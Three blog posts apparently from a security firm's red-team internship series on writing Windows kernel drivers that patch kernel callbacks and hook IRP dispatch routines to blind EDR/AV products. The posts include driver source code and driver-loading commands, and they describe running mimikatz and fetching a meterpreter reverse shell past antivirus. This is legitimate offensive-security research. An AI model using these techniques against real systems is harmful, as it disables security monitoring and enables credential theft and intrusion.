🔒
There are new articles available, click to refresh the page.
Before yesterdayNVISO Labs

Kernel Karnage – Part 1

21 October 2021 at 15:13

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi.dll,... and all the user processes and applications. When applications or processes need more advanced access or control to hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (x64-bit), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

Opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64-bit edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Window kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately Bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.

bugcheck

3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft Documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware, there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to a EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft made an end to patching SSDT in x64-bit versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straight forward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a return RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

;
; evil.inf
;

[Version]
Signature="$WINDOWS NT$"
Class=System
ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}
Provider=%ManufacturerName%
DriverVer=
CatalogFile=evil.cat
PnpLockDown=1

[DestinationDirs]
DefaultDestDir = 12


[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]


[DefaultInstall.ntamd64]

[Standard.NT$ARCH$]


[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
ClassName=""
DiskName="evil Source Disk"

Once the driver compiled and got signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.

bsod

Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.

PsSetCreateProcessNotifyRoutine

Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.

PspSetCreateProcessNotifyRoutine

Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and

The driver roughly follows the same method to locate the callback array in memory; by calculating offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which we obtain using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop though the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for 0xE8 OPCODE which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
	{
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
		{
			OffsetAddr = 0;

			//copy 4 bytes after CALL (0xE8) instruction, the 4 bytes contain the relative offset to the PspSetCreateProcessNotifyRoutine() function address
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;

			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
	
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for 0x4C 0x8D 0x2D OPCODES which is the LEA, r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
	{
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
		{
			OffsetAddr = 0;

            //copy 4 bytes after LEA, r13 (0x4C 0x8D 0x2D) instruction
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //return the relative offset to the callback array
			return OffsetAddr + 7 + i;
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where OPCODE_*[g_WindowsIndex] are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumer).

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3 byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 2 (Back to Basics)

29 October 2021 at 14:40

This week I try to figure out “what makes a driver a driver?” and experiment with writing my own kernel hooks.

1. Windows Kernel Programming 101

In the first part of this internship blog series, we took a look at how EDRs interact with User and Kernel space, and explored a frequently used feature called Kernel Callbacks by leveraging the Windows Kernel Ps Callback Experiments project by @fdiskyou to patch them in memory. Kernel callbacks are only the first step in a line of defense that modern EDR and AV solutions leverage when deploying kernel drivers to identify malicious activity. To better understand what we’re up against, we need to take a step back and familiarize ourselves with the concept of a driver itself.

To do just that, I spent the vast majority of my time this week reading the fantastic book Windows Kernel Programming by Pavel Yosifovich, which is a great introduction to the Windows kernel and its components and mechanisms, as well as drivers and their anatomy and functions.

In this blogpost I would like to take a closer look at the anatomy of a driver and experiment with a different technique called IRP MajorFunction hooking.

2. Anatomy of a driver

Most of us are familiar with the classic C/C++ projects and their characteristics; for example, the int main(int argc, char* argv[]){ return 0; } function, which is the typical entry point of a C++ console application. So, what makes a driver a driver?

Just like a C++ console application, a driver requires an entry point as well. This entry point comes in the form of a DriverEntry() function with the prototype:

NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath);

The DriverEntry() function is responsible for 2 major tasks:

  1. setting up the driver’s DeviceObject and associated symbolic link
  2. setting up the dispatch routines

Every driver needs an “endpoint” that other applications can use to communicate with. This comes in the form of a DeviceObject, an instance of the DEVICE_OBJECT structure. The DeviceObject is abstracted in the form of a symbolic link and registered in the Object Manager’s GLOBAL?? directory (use sysinternal’s WinObj tool to view the Object Manager). User mode applications can use functions like NtCreateFile with the symbolic link as a handle to talk to the driver.

WinObj

Example of a C++ application using CreateFile to talk to a driver registered as “Interceptor” (hint: it’s my driver 😉 ):

HANDLE hDevice = CreateFile(L"\\\\.\\Interceptor)", GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);

Once the driver’s endpoint is configured, the DriverEntry() function needs to sort out what to do with incoming communications from user mode and other operations such as unloading itself. To do this, it uses the DriverObject to register Dispatch Routines, or functions associated with a particular driver operation.

The DriverObject contains an array, holding function pointers, called the MajorFunction array. This array determines which particular operations are supported by the driver, such as Create, Read, Write, etc. The index of the MajorFunction array is controlled by Major Function codes, defined by their IRP_MJ_ prefix.

There are 3 main Major Function codes along side the DriverUnload operation which need initializing for the driver to function properly:

// prototypes
void InterceptUnload(PDRIVER_OBJECT);
NTSTATUS InterceptCreateClose(PDEVICE_OBJECT, PIRP);
NTSTATUS InterceptDeviceControl(PDEVICE_OBJECT, PIRP);

//DriverEntry
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    DriverObject->DriverUnload = InterceptUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] =  InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = InterceptDeviceControl;

    //...
}

The DriverObject->DriverUnload dispatch routine is responsible for cleaning up and preventing any memory leaks before the driver unloads. A leak in the kernel will persist until the machine is rebooted. The IRP_MJ_CREATE and IRP_MJ_CLOSE Major Functions handle CreateFile() and CloseHandle() calls. Without them, handles to the driver wouldn’t be able to be created or destroyed, so in a way the driver would be unusable. Finally, the IRP_MJ_DEVICE_CONTROL Major Function is in charge of I/O operations/communications.

A typical driver communicates by receiving requests, handling those requests or forwarding them to the appropriate device in the device stack (out of scope for this blogpost). These requests come in the form of an I/O Request Packet or IRP, which is a semi-documented structure, accompanied by one or more IO_STACK_LOCATION structures, located in memory directly following the IRP. Each IO_STACK_LOCATION is related to a device in the device stack and the driver can call the IoGetCurrentIrpStackLocation() function to retrieve the IO_STACK_LOCATION related to itself.

The previously mentioned dispatch routines determine how these IRPs are handled by the driver. We are interested in the IRP_MJ_DEVICE_CONTROL dispatch routine, which corresponds to the DeviceIoControl() call from user mode or ZwDeviceIoControlFile() call from kernel mode. An IRP request destined for IRP_MJ_DEVICE_CONTROL contains two user buffers, one for reading and one for writing, as well as a control code indicated by the IOCTL_ prefix. These control codes are defined by the driver developer and indicate the supported actions.

Control codes are built using the CTL_CODE macro, defined as:

#define CTL_CODE(DeviceType, Function, Method, Access)((DeviceType) << 16 | ((Access) << 14) | ((Function) << 2) | (Method))

Example for my Interceptor driver:

#define IOCTL_INTERCEPTOR_HOOK_DRIVER CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_DRIVER CTL_CODE(0x8000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_LIST_DRIVERS CTL_CODE(0x8000, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_ALL_DRIVERS CTL_CODE(0x8000, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS)

3. Kernel land hooks

Now that we have a vague idea how drivers communicate with other drivers and applications, we can think about ways to intercept those communications. One of these techniques is called IRP MajorFunction hooking.

hook MFA

Since drivers and all other kernel processes share the same memory, we can also access and overwrite that memory as long as we don’t upset PatchGuard by modifying critical structures. I wrote a driver called Interceptor, which does exactly that. It locates the target driver’s DriverObject and retrieves its MajorFunction array (MFA). This is done using the undocumented ObReferenceObjectByName() function, which uses the driver device name to get a pointer to the DriverObject.

UNICODE_STRING targetDriverName = RTL_CONSTANT_STRING(L"\\Driver\\Disk");
PDRIVER_OBJECT DriverObject = nullptr;

status = ObReferenceObjectByName(
	&targetDriverName,
	OBJ_CASE_INSENSITIVE,
	nullptr,
	0,
	*IoDriverObjectType,
	KernelMode,
	nullptr,
	(PVOID*)&DriverObject
);

if (!NT_SUCCESS(status)) {
	KdPrint((DRIVER_PREFIX "failed to obtain DriverObject (0x%08X)\n", status));
	return status;
}

Once it has obtained the MFA, it will iterate over all the Dispatch Routines (IRP_MJ_) and replace the pointers, which are pointing to the target driver’s functions (0x1000 – 0x1003), with my own pointers, pointing to the *InterceptHook functions (0x2000 – 0x2003), controlled by the Interceptor driver.

for (int i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) {
    //save the original pointer in case we need to restore it later
	globals.originalDispatchFunctionArray[i] = DriverObject->MajorFunction[i];
    //replace the pointer with our own pointer
	DriverObject->MajorFunction[i] = &GenericHook;
}
//cleanup
ObDereferenceObject(DriverObject);

As an example, I hooked the disk driver’s IRP_MJ_DEVICE_CONTROL dispatch routine and intercepted the calls:

Hooked IRP Disk Driver

This method can be used to intercept communications to any driver but is fairly easy to detect. A driver controlled by EDR/AV could iterate over its own MajorFunction array and check the function pointer’s address to see if it is located in its own address range. If the function pointer is located outside its own address range, that means the dispatch routine was hooked.

4. Conclusion

To defeat EDRs in kernel space, it is important to know what goes on at the core, namely the driver. In this blogpost we examined the anatomy of a driver, its functions, and their main responsibilities. We established that a driver needs to communicate with other drivers and applications in user space, which it does via dispatch routines registered in the driver’s MajorFunction array.

We then briefly looked at how we can intercept these communications by using a technique called IRP MajorFunction hooking, which patches the target driver’s dispatch routines in memory with pointers to our own functions, so we can inspect or redirect traffic.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 3 (Challenge Accepted)

16 November 2021 at 08:28

While I was cruising along, taking in the views of the kernel landscape, I received a challenge …

1. Player 2 has entered the game

The past weeks I mostly experimented with existing tooling and got acquainted with the basics of kernel driver development. I managed to get a quick win versus $vendor1 but that didn’t impress our blue team, so I received a challenge to bypass $vendor2. I have to admit, after trying all week to get around the protections, $vendor2 is definitely a bigger beast to tame.

I foolishly tried to rely on blocking the kernel callbacks using the Evil driver from my first post and quickly concluded that wasn’t going to cut it. To win this fight, I needed bigger guns.

2. Know your enemy

$vendor2’s defenses consist of a number of driver modules:

  • eamonm.sys (monitoring agent?)
  • edevmon.sys (device monitor?)
  • eelam.sys (early launch anti-malware driver)
  • ehdrv.sys (helper driver?)
  • ekbdflt.sys (keyboard filter?)
  • epfw.sys (personal firewall driver?)
  • epfwlwf.sys (personal firewall light-weight filter?)
  • epfwwfp.sys (personal firewall filter?)

and a user mode service: ekrn.exe ($vendor2 kernel service) running as a System Protected Process (enabled by eelam.sys driver).

At this stage I am only guessing the roles and functionality of the different driver modules based on their names and some behaviour I have observed during various tests, mainly because I haven’t done any reverse-engineering yet. Since I am interested in running malicious binaries on the protected system, my initial attack vector is to disable the functionality of the ehdrv.sys, epfw.sys and epfwwfp.sys drivers. As far as I can tell using WinObj and listing all loaded modules in WinDbg (lm command), epfwlwf.sys does not appear to be running and neither does eelam.sys, which I presume is only used in the initial stages when the system is booting up to start ekrn.exe as a System Protected Process.

WinObj GLOBALS?? directory listing

In the context of my internship being focused on the kernel, I have not (yet) considered attacking the protected ekrn.exe service. According to the Microsoft Documentation, a protected process is shielded from code injection and other attacks from admin processes. However, a quick Google search tells me otherwise 😉

3. Interceptor

With my eye on the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, I noticed they all have registered callbacks, either for process creation, thread creation, or both. I’m still working on expanding my own driver to include callback functionality, which will also look at image load callbacks, which are used to detect the loading of drivers and so on. Luckily, the Evil driver has got this angle (partially) covered for now.

ESET registered callbacks

Unfortunately, we cannot solely rely on blocking kernel callbacks. Other sources contacting the $vendor2 drivers and reporting suspicious activity should also be taken into consideration. In my previous post I briefly touched on IRP MajorFunction hooking, which is a good -although easy to detect- way of intercepting communications between drivers and other applications.

I wrote my own driver called Interceptor, which combines the ideas of @zodiacon’s Driver Monitor project and @fdiskyou’s Evil driver.

To gather information about all the loaded drivers on the system, I used the AuxKlibQueryModuleInformation() function. Note that because I return output via pass-by-reference parameters, the calling function is responsible for cleaning up any allocated memory and preventing a leak.

NTSTATUS ListDrivers(PAUX_MODULE_EXTENDED_INFO& outModules, ULONG& outNumberOfModules) {
    NTSTATUS status;
    ULONG modulesSize = 0;
    PAUX_MODULE_EXTENDED_INFO modules;
    ULONG numberOfModules;

    status = AuxKlibInitialize();
    if(!NT_SUCCESS(status))
        return status;

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), nullptr);
    if (!NT_SUCCESS(status) || modulesSize == 0)
        return status;

    numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);

    modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);
    if (modules == nullptr)
        return STATUS_INSUFFICIENT_RESOURCES;

    RtlZeroMemory(modules, modulesSize);

    status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);
    if (!NT_SUCCESS(status)) {
        ExFreePoolWithTag(modules, DRIVER_TAG);
        return status;
    }

    //calling function is responsible for cleanup
    //if (modules != NULL) {
    //	ExFreePoolWithTag(modules, DRIVER_TAG);
    //}

    outModules = modules;
    outNumberOfModules = numberOfModules;

    return status;
}

Using this function, I can obtain information like the driver’s full path, its file name on disk and its image base address. This information is then passed on to the user mode application (InterceptorCLI.exe) or used to locate the driver’s DriverObject and MajorFunction array so it can be hooked.

To hook the driver’s dispatch routines, I still rely on the ObReferenceObjectByName() function, which accepts a UNICODE_STRING parameter containing the driver’s name in the format \\Driver\\DriverName. In this case, the driver’s name is derived from the driver’s file name on disk: mydriver.sys –> \\Driver\\mydriver.

However, it should be noted that this is not a reliable way to obtain a handle to the DriverObject, since the driver’s name can be set to anything in the driver’s DriverEntry() function when it creates the DeviceObject and symbolic link.

Once a handle is obtained, the target driver will be stored in a global array and its dispatch routines hooked and replaced with my InterceptGenericDispatch() function. The target driver’s DriverObject->DriverUnload dispatch routine is separately hooked and replaced by my GenericDriverUnload() function, to prevent the target driver from unloading itself without us knowing about it and causing a nightmare with dangling pointers.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
	UNREFERENCED_PARAMETER(DeviceObject);
    auto stack = IoGetCurrentIrpStackLocation(Irp);
	auto status = STATUS_UNSUCCESSFUL;
	KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
	    return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}
void GenericDriverUnload(PDRIVER_OBJECT DriverObject) {
	for (int i = 0; i < MaxIntercept; i++) {
		if (globals.Drivers[i].DriverObject == DriverObject) {
			if (globals.Drivers[i].DriverUnload) {
				globals.Drivers[i].DriverUnload(DriverObject);
			}
			UnhookDriver(i);
		}
	}
	NT_ASSERT(false);
}

4. Early bird gets the worm

Armed with my new Interceptor driver, I set out to try and defeat $vendor2 once more. Alas, no luck, mimikatz.exe was still detected and blocked. This got me thinking, running such a well-known malicious binary without any attempts to hide it or obfuscate it is probably not realistic in the first place. A signature check alone would flag the binary as malicious. So, I decided to write my own payload injector for testing purposes.

Based on research presented in An Empirical Assessment of Endpoint Detection and Response Systems against Advanced Persistent Threats Attack Vectors by George Karantzas and Constantinos Patsakis, I chose for a shellcode injector using:
– the EarlyBird code injection technique
– PPID spoofing
– Microsoft’s Code Integrity Guard (CIG) enabled to prevent non-Microsoft DLLs from being injected into our process
– Direct system calls to bypass any user mode hooks.

The injector delivers shellcode to fetch a “windows/x64/meterpreter/reverse_tcp” payload from the Metasploit framework.

Using my shellcode injector, combined with the Evil driver to disable kernel callbacks and my Interceptor driver to intercept any IRPs to the ehdrv.sys, epfw.sys and epfwwfp.sys drivers, the meterpreter payload is still detected but not blocked by $vendor2.

5. Conclusion

In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load-, registry- and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

